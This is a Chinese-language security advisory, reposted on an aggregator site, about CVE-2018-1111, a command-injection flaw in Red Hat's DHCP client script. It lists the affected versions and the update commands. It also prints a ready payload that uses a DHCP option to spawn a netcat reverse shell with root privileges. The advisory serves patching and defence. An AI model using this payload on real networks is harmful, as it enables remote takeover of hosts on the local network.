Red Hat DHCP客户端命令执行漏洞是怎么样的
发表于:2025-02-22 作者:千家信息网编辑
千家信息网最后更新 2025年02月22日,这篇文章给大家介绍Red Hat DHCP客户端命令执行漏洞是怎么样的,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。0x00 漏洞概述近日,红帽官方发布了安全更新,修复了编号为C
千家信息网最后更新 2025年02月22日Red Hat DHCP客户端命令执行漏洞是怎么样的
这篇文章给大家介绍Red Hat DHCP客户端命令执行漏洞是怎么样的,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。
0x00 漏洞概述
近日,红帽官方发布了安全更新,修复了编号为CVE-2018-1111的远程代码执行漏洞,攻击者可以通过伪造DHCP服务器发送响应包,攻击红帽系统,获取root权限并执行任意命令。
目前相关利用代码已经公开,可用于本地网络攻击;360-CERT此漏洞进行了技术分析,认为该漏洞危害等级严重,建议使用相关用户尽快进行更新。
0x01 漏洞影响面
影响版本
Red Hat Enterprise Linux Server 6
Red Hat Enterprise Linux Server 7
CentOS 6
CentOS 7
修复方案
受影响产品的更新
软件包更新
#yum update dhclient
#rpm -qa --changelog dhclient | grep CVE-2018
- Resolves: #1570898 - Fix CVE-2018-1111: Do not parse backslash as escape character
0x02 漏洞详情
DHCP 是一个局域网的网络协议,主要用于内部网络动态IP地址分配。
Red Hat提供的DHCP客户端软件包dhclient的脚本为/etc/NetworkManager/dispatcher.d/11-dhclient(Red Hat Enterprise Linux 7)和/etc/NetworkManager/dispatcher.d/10-dhclient(Red Hat Enterprise Linux 6);当NetworkManager组件从DHCP服务器收到DHCP响应时执行该脚本。
使用单引号使参数值逃逸成功,导致了命令执行
--dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #"
关于Red Hat DHCP客户端命令执行漏洞是怎么样的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
漏洞
命令
更新
客户
客户端
网络
影响
攻击
代码
内容
更多
服务器
红帽
脚本
软件
软件包
帮助
服务
不错
安全
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
azure服务器白嫖
国际玻璃数据库网站
内网如何搭建一个资料储存服务器
文档安全服务器
软件开发可以自己做吗
数据库中查询表大小
mac软件开发教程
精益软件开发 帕彭迪克
得集团软件开发岗位怎么样
易县租房软件开发
服务器无法访问政府网站
阿里的服务器在哪放着
excel导入数据库算法
hp 服务器光盘启动
天津加工软件开发发展现状
计算机网络技术博主
ibm服务器错误代码
数据库hdp是什么
工业网络技术基础
软件开发热门专业
阿里云服务器刚购买能登录吗
长沙芙蓉区网络安全怎么办
徐州银联软件开发来电咨询
数据库课表模型
任仲评:网络安全
家庭教育与网络安全在线观看
洋河股份软件开发岗待遇
华伊网络技术
中央网络安全和信息化小组百科
2016关于网络安全事件